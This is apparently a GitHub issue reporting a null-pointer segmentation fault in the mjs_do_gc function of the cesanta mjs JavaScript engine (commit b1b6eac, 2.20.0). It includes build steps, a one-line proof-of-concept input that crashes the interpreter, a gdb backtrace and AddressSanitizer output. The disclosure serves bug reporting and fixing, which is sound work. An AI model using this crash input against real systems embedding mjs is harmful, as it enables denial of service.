cesanta/mjs

Segmentation fault on mjs_do_gc

CStriker opened this issue · 0 comments

The name of an affected Product
mjs

The affected version
Commit: b1b6eac (Tag: 2.20.0)

Description
An issue in cesanta mjs 2.20.0 allows a remote attacker to cause a denial of service via the mjs_do_gc function in the mjs.c file.

Vulnerability Type
Segmentation fault

Environment

  • Operating System

Ubuntu 20.04

  • Steps to Reproduce
git clone https://github.com/cesanta/mjs
cd mjs
git checkout b1b6eac
gcc -DMJS_MAIN -fsanitize=address mjs.c -ldl -g -o mjs-asan
poc

gc(3+gc)(gc )

run command

./mjs-asan -f poc

gdb info

Program received signal SIGSEGV, Segmentation fault.
0x000055555557bada in mjs_do_gc (mjs=0x55555559fa76 <mjs_get_ptr+55>) at mjs.c:7360
7360	static void mjs_do_gc(struct mjs *mjs) {
--Type <RET> for more, q to quit, c to continue without paging--
#0  0x000055555557bada in mjs_do_gc (mjs=0x55555559fa76 <mjs_get_ptr+55>) at mjs.c:7360
#1  0x0000555555583ffd in mjs_execute (mjs=0x615000000080, off=0, res=0x7fffffffd9f0) at mjs.c:8824
#2  0x0000555555585183 in mjs_exec_internal (mjs=0x615000000080, path=0x7fffffffe0b7 "../bug_1", src=0x602000000050 " gc(3+gc)(gc )", generate_jsc=0, res=0x7fffffffdab0) at mjs.c:9044
#3  0x0000555555585460 in mjs_exec_file (mjs=0x615000000080, path=0x7fffffffe0b7 "../bug_1", res=0x7fffffffdb80) at mjs.c:9067
#4  0x00005555555913e1 in main (argc=3, argv=0x7fffffffdcd8) at mjs.c:11406

address sanitizer info

AddressSanitizer:DEADLYSIGNAL
=================================================================
==1337961==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x55555557bada bp 0x7fffffffda10 sp 0x7fffffffd708 T0)
==1337961==The signal is caused by a READ memory access.
==1337961==Hint: address points to the zero page.
    #0 0x55555557bad9 in mjs_do_gc /home/hjkim/work/afl_exp/directed_fuzzing/mjs_latest/mjs/mjs.c:7360
    #1 0x555555583ffc in mjs_execute /home/hjkim/work/afl_exp/directed_fuzzing/mjs_latest/mjs/mjs.c:8824
    #2 0x555555585182 in mjs_exec_internal /home/hjkim/work/afl_exp/directed_fuzzing/mjs_latest/mjs/mjs.c:9044
    #3 0x55555558545f in mjs_exec_file /home/hjkim/work/afl_exp/directed_fuzzing/mjs_latest/mjs/mjs.c:9067
    #4 0x5555555913e0 in main /home/hjkim/work/afl_exp/directed_fuzzing/mjs_latest/mjs/mjs.c:11406
    #5 0x7ffff73a1082 in __libc_start_main ../csu/libc-start.c:308
    #6 0x55555555c8ed in _start (/data1/hjkim/afl_exp/directed_fuzzing/mjs_latest/mjs/mjs-asan+0x88ed)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/hjkim/work/afl_exp/directed_fuzzing/mjs_latest/mjs/mjs.c:7360 in mjs_do_gc
==1337961==ABORTING